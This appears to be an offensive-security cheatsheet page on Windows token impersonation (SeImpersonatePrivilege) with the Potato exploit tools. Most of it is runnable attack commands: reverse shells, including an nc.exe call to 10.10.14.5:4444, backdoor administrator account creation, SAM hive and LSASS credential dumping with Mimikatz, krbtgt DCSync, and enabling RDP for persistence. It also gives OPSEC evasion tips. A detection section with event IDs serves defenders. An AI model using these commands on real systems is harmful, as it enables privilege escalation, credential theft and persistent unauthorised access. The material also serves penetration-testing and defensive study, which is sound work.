daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

attack-45-token-impersonation-seimpersonateprivilege.md (17567B)


      1 ---
      2 title: "Attack #45 β€” Token Impersonation (SeImpersonatePrivilege)"
      3 description: "Token Impersonation is a local privilege escalation technique that exploits the Windows SeImpersonatePrivilege (or SeAssignPrimaryTokenPrivilege) to…"
      4 category: active-directory
      5 subcategory: "Privilege & Group Abuse"
      6 tags: ["active-directory", "adcs", "privilege-escalation", "sql-injection"]
      7 tools: ["Impacket", "Mimikatz", "Metasploit", "Meterpreter", "PowerShell"]
      8 difficulty: advanced
      9 updated: "2026-08-10"
     10 source: "vault:ActiveDirectory/AD-Attack/Category-Six/🟣 Attack #45 β€” Token Impersonation (SeImpersonatePrivilege).md"
     11 ---
     12 # 🟣 Attack #45 β€” Token Impersonation (SeImpersonatePrivilege)
     13 
     14 ***
     15 
     16 ## πŸ“– How It Works
     17 
     18 Token Impersonation is a **local privilege escalation technique** that exploits the Windows `SeImpersonatePrivilege` (or `SeAssignPrimaryTokenPrivilege`) to escalate from a service account to `NT AUTHORITY\SYSTEM` β€” the highest privilege level on a Windows system. This privilege is granted by default to all service accounts, IIS AppPool identities, MSSQL service accounts, and any process running as `NETWORK SERVICE` or `LOCAL SERVICE`. If an attacker compromises any of these accounts (via web shell, SQL injection, etc.), they can escalate to SYSTEM in seconds.
     19 
     20 ### How It Works Technically
     21 
     22 1. **The attacker controls a process** with `SeImpersonatePrivilege` (e.g., a web shell running as `IIS APPPOOL\DefaultAppPool`)
     23 2. **The attacker creates a listener** β€” typically a named pipe or a COM server that listens for incoming connections
     24 3. **A SYSTEM-level process is tricked into authenticating** to the attacker's listener β€” this is achieved by abusing various Windows services (Print Spooler, BITS, DCOM/COM objects, RPC endpoints)
     25 4. **The attacker captures the SYSTEM token** β€” when the privileged process connects, Windows lets the attacker impersonate the connecting client's security context because `SeImpersonatePrivilege` explicitly allows this
     26 5. **The attacker spawns a new process** (cmd.exe, reverse shell, beacon) using the captured SYSTEM token
     27 
     28 ### The "Potato" Family Evolution
     29 
     30 The Potato exploit family has evolved over 8+ years as Microsoft patched specific coercion methods, spawning new variants:
     31 
     32 | Tool | Year | Coercion Method | Target OS | Status |
     33 |---|---|---|---|---|
     34 | **Hot Potato** | 2016 | NBNS spoofing + WPAD + NTLM relay | Win 7/8/10, Server 2008/2012 | ❌ Patched |
     35 | **Rotten Potato** | 2016 | DCOM/BITS β†’ NTLM relay to local OXID | Win 10, Server 2012/2016 | ❌ Patched |
     36 | **Juicy Potato** | 2018 | Arbitrary CLSID COM abuse | Win ≀10 1803, Server ≀2016 | ⚠️ Partial |
     37 | **Rogue Potato** | 2020 | Remote OXID resolution β†’ named pipe | Win 10, Server 2019 | βœ… Works |
     38 | **Sweet Potato** | 2020 | Combined β€” Print Bug + COM + WinRM | Multiple versions | βœ… Works |
     39 | **PrintSpoofer** | 2020 | Print Spooler named pipe impersonation | Win 10, Server 2016/2019 | βœ… Works |
     40 | **EfsPotato** | 2021 | EFS RPC β†’ named pipe impersonation | Win 10/11, Server 2019/2022 | βœ… Works |
     41 | **GodPotato** | 2022 | RPCSS DCOM activation β†’ unnamed pipe | Win 2012–2022, Win 8–11 | βœ… Works |
     42 | **SigmaPotato** | 2023 | GodPotato fork with improvements | Multiple versions | βœ… Works |
     43 | **CoercedPotato** | 2024 | Multi-protocol coercion (MS-EFSR, MS-RPRN, etc.) | Multiple versions | βœ… Works |
     44 
     45 ### Why Service Accounts Have This Privilege
     46 
     47 ```
     48 # Check current privileges:
     49 whoami /priv
     50 
     51 # If you see either of these, you can escalate:
     52 # SeImpersonatePrivilege        Impersonate a client after authentication   Enabled
     53 # SeAssignPrimaryTokenPrivilege Replace a process level token               Enabled
     54 
     55 # These accounts typically have SeImpersonatePrivilege:
     56 # - IIS AppPool accounts (web shells)
     57 # - MSSQL Server service accounts (xp_cmdshell)
     58 # - NETWORK SERVICE
     59 # - LOCAL SERVICE
     60 # - Any Windows service account
     61 ```
     62 
     63 ***
     64 
     65 ## βš™οΈ Prerequisites
     66 
     67 | Requirement | Detail |
     68 |---|---|
     69 | **Shell as service account** | Running as IIS AppPool, MSSQL, NETWORK SERVICE, or any account with `SeImpersonatePrivilege` |
     70 | **SeImpersonatePrivilege enabled** | `whoami /priv` must show `SeImpersonatePrivilege` or `SeAssignPrimaryTokenPrivilege` |
     71 | **Local system access** | This is a LOCAL privilege escalation β€” you need a shell on the target machine |
     72 | **Appropriate Potato tool** | Must match the target OS version (see compatibility table above) |
     73 
     74 ***
     75 
     76 ## πŸ› οΈ Tools
     77 
     78 | Tool | Platform | Notes |
     79 |---|---|---|
     80 | **GodPotato** | Windows | Most universally compatible β€” works on 2012-2022 |
     81 | **PrintSpoofer** | Windows | Fast, clean β€” requires Print Spooler running |
     82 | **JuicyPotato** | Windows | Classic β€” older systems only (≀ Win 10 1803) |
     83 | **JuicyPotatoNG** | Windows | Updated version with better compatibility |
     84 | **SweetPotato** | Windows | Combined approach β€” multiple coercion methods |
     85 | **EfsPotato** | Windows | EFS-based β€” works on modern systems |
     86 | **SigmaPotato** | Windows | GodPotato improvement β€” broader support |
     87 | **CoercedPotato** | Windows | Multi-protocol β€” most comprehensive |
     88 | **SharpEfsPotato** | Windows | .NET implementation of EFS Potato |
     89 | **Incognito** | Meterpreter | Token manipulation via Meterpreter framework |
     90 
     91 ***
     92 
     93 ## πŸ’» Full Commands
     94 
     95 ### πŸ”΅ Step 0 β€” Verify SeImpersonatePrivilege
     96 
     97 ```powershell
     98 # ── Check if you have the required privilege ──────────────────────────────────
     99 whoami /priv
    100 
    101 # Expected output for exploitable service accounts:
    102 # Privilege Name                Description                               State
    103 # ============================= ========================================= ========
    104 # SeImpersonatePrivilege        Impersonate a client after authentication Enabled
    105 # SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
    106 #                               (either one is sufficient)
    107 
    108 # ── Check who you are ─────────────────────────────────────────────────────────
    109 whoami
    110 # Expected: iis apppool\defaultapppool, nt service\mssqlserver, etc.
    111 
    112 # ── Check OS version (to pick the right Potato) ──────────────────────────────
    113 systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
    114 [System.Environment]::OSVersion.Version
    115 ```
    116 
    117 ***
    118 
    119 ### πŸ”΄ GodPotato (Recommended β€” Broadest Compatibility)
    120 
    121 ```powershell
    122 # ── Spawn a SYSTEM command prompt ─────────────────────────────────────────────
    123 .\GodPotato.exe -cmd "cmd /c whoami"
    124 # Output: nt authority\system
    125 
    126 # ── Execute a reverse shell as SYSTEM ─────────────────────────────────────────
    127 .\GodPotato.exe -cmd "cmd /c powershell -e <base64_reverse_shell>"
    128 
    129 # ── Create a new admin user as SYSTEM ─────────────────────────────────────────
    130 .\GodPotato.exe -cmd "cmd /c net user hacker P@ssword123! /add && net localgroup Administrators hacker /add"
    131 
    132 # ── Dump SAM database ────────────────────────────────────────────────────────
    133 .\GodPotato.exe -cmd "cmd /c reg save HKLM\SAM C:\Temp\SAM && reg save HKLM\SYSTEM C:\Temp\SYSTEM"
    134 
    135 # ── Run Mimikatz as SYSTEM ────────────────────────────────────────────────────
    136 .\GodPotato.exe -cmd "cmd /c C:\Temp\mimikatz.exe privilege::debug sekurlsa::logonpasswords exit > C:\Temp\creds.txt"
    137 ```
    138 
    139 ***
    140 
    141 ### πŸ”΄ PrintSpoofer (Clean & Fast β€” Requires Print Spooler)
    142 
    143 ```powershell
    144 # ── Check if Print Spooler is running ─────────────────────────────────────────
    145 Get-Service Spooler
    146 sc query Spooler
    147 
    148 # ── Spawn interactive SYSTEM shell ────────────────────────────────────────────
    149 .\PrintSpoofer64.exe -i -c cmd
    150 # Drops you into an interactive cmd.exe as SYSTEM
    151 
    152 # ── Non-interactive command execution ─────────────────────────────────────────
    153 .\PrintSpoofer64.exe -c "cmd /c whoami"
    154 # Output: nt authority\system
    155 
    156 # ── Reverse shell ─────────────────────────────────────────────────────────────
    157 .\PrintSpoofer64.exe -c "cmd /c C:\Temp\nc.exe 10.10.14.5 4444 -e cmd.exe"
    158 
    159 # ── 32-bit version (for 32-bit processes like IIS on x86 app pools) ──────────
    160 .\PrintSpoofer32.exe -i -c cmd
    161 ```
    162 
    163 ***
    164 
    165 ### πŸ”΄ JuicyPotato (Legacy β€” Older OS Only)
    166 
    167 ```powershell
    168 # ── Basic SYSTEM shell ────────────────────────────────────────────────────────
    169 .\JuicyPotato.exe -l 1337 -p cmd.exe -t * -c {F87B28F1-DA9A-4F35-8EC0-800EFCF26B83}
    170 # -l = COM listener port (arbitrary)
    171 # -p = program to launch as SYSTEM
    172 # -t = createprocess call type (* = try both)
    173 # -c = CLSID to abuse (varies by OS β€” see below)
    174 
    175 # ── Execute specific command ──────────────────────────────────────────────────
    176 .\JuicyPotato.exe -l 1337 -p cmd.exe -a "/c whoami > C:\Temp\whoami.txt" \
    177   -t * -c {F87B28F1-DA9A-4F35-8EC0-800EFCF26B83}
    178 
    179 # ── Reverse shell ─────────────────────────────────────────────────────────────
    180 .\JuicyPotato.exe -l 1337 -p cmd.exe \
    181   -a "/c powershell -e <base64_reverse_shell>" \
    182   -t * -c {F87B28F1-DA9A-4F35-8EC0-800EFCF26B83}
    183 
    184 # ── Common CLSIDs by OS ──────────────────────────────────────────────────────
    185 # Windows 10 Pro:  {F87B28F1-DA9A-4F35-8EC0-800EFCF26B83}
    186 # Windows Server 2016: {8F5DF053-3013-4dd8-B5F4-88214E81C0CF}
    187 # Windows Server 2012: {e60687f7-01a1-40aa-86ac-db1cbf673334}
    188 # Full CLSID list: https://github.com/ohpe/juicy-potato/blob/master/CLSID/README.md
    189 ```
    190 
    191 ***
    192 
    193 ### πŸ”΄ EfsPotato (Modern Systems)
    194 
    195 ```powershell
    196 # ── Compile and run (requires .NET framework) ────────────────────────────────
    197 .\EfsPotato.exe whoami
    198 # Output: nt authority\system
    199 
    200 # ── Execute command ───────────────────────────────────────────────────────────
    201 .\EfsPotato.exe "cmd /c net user hacker P@ssword123! /add"
    202 .\EfsPotato.exe "cmd /c net localgroup Administrators hacker /add"
    203 ```
    204 
    205 ***
    206 
    207 ### πŸ”΄ SweetPotato (Multi-Method)
    208 
    209 ```powershell
    210 # ── Auto-detect best method ──────────────────────────────────────────────────
    211 .\SweetPotato.exe -p cmd.exe -a "/c whoami"
    212 
    213 # ── Specify method (PrintSpoofer technique) ───────────────────────────────────
    214 .\SweetPotato.exe -e PrintSpoofer -p cmd.exe -a "/c whoami"
    215 
    216 # ── WinRM method ──────────────────────────────────────────────────────────────
    217 .\SweetPotato.exe -e WinRM -p cmd.exe -a "/c whoami"
    218 
    219 # ── DCOM method (classic Juicy) ───────────────────────────────────────────────
    220 .\SweetPotato.exe -e DCOM -p cmd.exe -a "/c whoami"
    221 ```
    222 
    223 ***
    224 
    225 ### πŸ”΄ Meterpreter β€” Incognito Module (If Using Metasploit)
    226 
    227 ```bash
    228 # ── From a Meterpreter session ────────────────────────────────────────────────
    229 meterpreter> load incognito
    230 
    231 # List available tokens
    232 meterpreter> list_tokens -u
    233 # Look for: NT AUTHORITY\SYSTEM, domain\admin_user, etc.
    234 
    235 # Impersonate SYSTEM token
    236 meterpreter> impersonate_token "NT AUTHORITY\SYSTEM"
    237 # [+] Delegation token available
    238 # [+] Successfully impersonated user NT AUTHORITY\SYSTEM
    239 
    240 # Impersonate domain admin token (if one is logged in)
    241 meterpreter> impersonate_token "CORP\domain_admin"
    242 
    243 # Verify
    244 meterpreter> getuid
    245 # Server username: NT AUTHORITY\SYSTEM
    246 
    247 # Drop to shell
    248 meterpreter> shell
    249 C:\> whoami
    250 nt authority\system
    251 ```
    252 
    253 ***
    254 
    255 ### πŸ”΄ Post-Exploitation β€” After SYSTEM
    256 
    257 ```powershell
    258 # ── Once SYSTEM, extract all credentials ──────────────────────────────────────
    259 
    260 # Dump all logon credentials from LSASS
    261 mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit
    262 
    263 # Dump SAM database (local accounts)
    264 reg save HKLM\SAM C:\Temp\SAM
    265 reg save HKLM\SYSTEM C:\Temp\SYSTEM
    266 reg save HKLM\SECURITY C:\Temp\SECURITY
    267 # Exfiltrate and parse with secretsdump.py:
    268 # secretsdump.py -sam SAM -system SYSTEM -security SECURITY LOCAL
    269 
    270 # Enable RDP for persistence
    271 reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
    272 netsh advfirewall firewall set rule group="remote desktop" new enable=Yes
    273 
    274 # Create a persistent admin account
    275 net user backdoor P@ssword123! /add
    276 net localgroup Administrators backdoor /add
    277 
    278 # If domain-joined, DCSync is now possible from this machine
    279 mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:corp.local /user:krbtgt" exit
    280 ```
    281 
    282 ***
    283 
    284 ## 🎯 OPSEC Tips
    285 
    286 - **GodPotato is the safest choice** β€” it works on the widest range of OS versions (2012-2022) and doesn't require specific services to be running
    287 - **PrintSpoofer is fastest** but requires Print Spooler β€” check `sc query Spooler` first; if it's disabled, use GodPotato
    288 - **JuicyPotato won't work** on Windows 10 build 1809+ or Server 2019+ β€” Microsoft blocked the DCOM activation path
    289 - **Avoid dropping binaries to disk** if possible β€” use in-memory execution via PowerShell reflection or .NET assembly loading
    290 - **The Potato exploit itself is not detected** as easily as what you do AFTER getting SYSTEM β€” credential dumping and admin account creation are the loud parts
    291 - **Token impersonation via Meterpreter/Incognito** is useful when there's a logged-in admin session on the box β€” you can steal their token without knowing their password
    292 
    293 ***
    294 
    295 ## πŸ›‘οΈ Detection β€” Event IDs
    296 
    297 | Event ID | Source | What to Look For |
    298 |---|---|---|
    299 | **4688** | Security Log | Process creation β€” unexpected `cmd.exe` or `powershell.exe` spawned by service accounts (IIS, MSSQL, etc.) |
    300 | **4672** | Security Log | Special privileges assigned to new logon β€” SYSTEM token usage from unexpected source |
    301 | **4624** | Security Log | New logon β€” SYSTEM logon (Type 2 or 5) from unexpected parent process |
    302 | **7045** | System Log | New service installed β€” some Potato variants create temporary services |
    303 | **Sysmon 10** | Sysmon | Process access β€” tool accessing LSASS memory (post-exploitation) |
    304 | **Sysmon 1** | Sysmon | Process creation with full command line β€” Potato binary execution |
    305 | **Sysmon 17/18** | Sysmon | Named pipe creation/connection β€” PrintSpoofer creates `\\.\pipe\spoolss` variants |
    306 
    307 **Primary detection signature:** Monitor for **unexpected parent-child process relationships** involving service accounts. If `w3wp.exe` (IIS), `sqlservr.exe` (MSSQL), or `svchost.exe` spawns `cmd.exe` or `powershell.exe` as SYSTEM, that is a near-certain indicator of token impersonation. Sysmon with proper configuration provides the most reliable detection through process creation events with full command lines and named pipe monitoring.
    308 
    309 ***
    310 
    311 ## πŸ”— Attack Chain Context
    312 
    313 ```
    314 [Token Impersonation] ──→ Local SYSTEM Privilege Escalation
    315          β”‚
    316          β”œβ”€β”€β†’ 🌐 Web shell (IIS) β†’ SeImpersonatePrivilege β†’ SYSTEM β†’ credentials
    317          β”œβ”€β”€β†’ πŸ—„οΈ SQL injection (MSSQL xp_cmdshell) β†’ SYSTEM β†’ lateral movement
    318          β”œβ”€β”€β†’ πŸ”‘ SYSTEM β†’ dump LSASS β†’ extract domain creds β†’ DCSync
    319          β”œβ”€β”€β†’ πŸ’» SYSTEM β†’ read DPAPI secrets, SAM hives, LSA secrets
    320          β”œβ”€β”€β†’ πŸ”— Chain with: PtH (Attack #4), DCSync (#37), lateral movement (#54-60)
    321          β”œβ”€β”€β†’ πŸ”„ Commonly the first escalation after initial web/SQL compromise
    322          └──→ πŸ’€ Defeated by: don't grant SeImpersonatePrivilege, use gMSAs, patch
    323 ```
    324 
    325 **Token Impersonation is the most common local privilege escalation** in real-world engagements. Nearly every web application compromise or SQL injection that yields command execution results in a service account shell with SeImpersonatePrivilege β€” and from there, SYSTEM is one binary execution away.
    326 
    327 ***
    328 
    329 > βœ… **Attack #45 β€” Token Impersonation complete.**